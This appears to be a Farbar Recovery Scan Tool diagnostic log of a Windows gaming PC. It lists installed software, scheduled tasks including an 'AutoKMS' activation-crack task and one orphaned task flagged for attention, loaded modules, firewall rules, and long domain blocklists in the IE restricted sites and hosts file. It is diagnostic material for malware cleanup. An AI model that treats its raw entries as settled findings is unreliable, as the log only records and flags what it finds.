    Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
    Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
    Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
    Scansoft PDF Professional (x32 Version: - ) Hidden
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
    Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
    Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
    Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
    StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
    TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
    TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
    Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
    Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
    Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
    World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
    Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
    Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
    Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
    Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {2F2930D6-5ED7-4563-8CC0-D92C411FA7B9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
    Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
    Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
    Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
    Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
    Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
    Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
    Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
    Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
    Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
    Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
    Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
    Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
    Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
    Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
    Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
    Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
    Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
    Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
    Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ==================== Loaded Modules (Whitelisted) ==============

    2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
    2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
    2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
    2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
    2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
    2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-07-10 21:00 - 2015-07-10 23:14 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
    2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
    2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
    2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
    2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
    2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
    2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
    2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
    2016-03-01 12:14 - 2016-03-01 12:14 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022901\algo.dll
    2016-03-01 20:49 - 2016-03-01 20:49 - 02836480 _____ () C:\Program Files\AVAST Software\Avast\defs\16030100\algo.dll
    2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
    2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
    2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
    IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
    IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
    IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.

    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008i.com -> 008i.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008k.com -> www.008k.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\010402.com -> 010402.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts

    127.0.0.1 www.007guard.com
    127.0.0.1 007guard.com
    127.0.0.1 008i.com
    127.0.0.1 www.008k.com
    127.0.0.1 008k.com
    127.0.0.1 www.00hq.com
    127.0.0.1 00hq.com
    127.0.0.1 010402.com
    127.0.0.1 www.032439.com
    127.0.0.1 032439.com
    127.0.0.1 www.0scan.com
    127.0.0.1 0scan.com
    127.0.0.1 1000gratisproben.com
    127.0.0.1 www.1000gratisproben.com
    127.0.0.1 1001namen.com
    127.0.0.1 www.1001namen.com
    127.0.0.1 100888290cs.com
    127.0.0.1 www.100888290cs.com
    127.0.0.1 www.100sexlinks.com
    127.0.0.1 100sexlinks.com
    127.0.0.1 10sek.com
    127.0.0.1 www.10sek.com
    127.0.0.1 www.1-2005-search.com
    127.0.0.1 1-2005-search.com
    127.0.0.1 123fporn.info
    127.0.0.1 www.123fporn.info
    127.0.0.1 123haustiereundmehr.com
    127.0.0.1 www.123haustiereundmehr.com
    127.0.0.1 123moviedownload.com
    127.0.0.1 www.123moviedownload.com

    There are 15468 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
    DNS Servers: 8.8.8.8 - 8.8.4.4
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
    FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
    FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
    FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
    FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
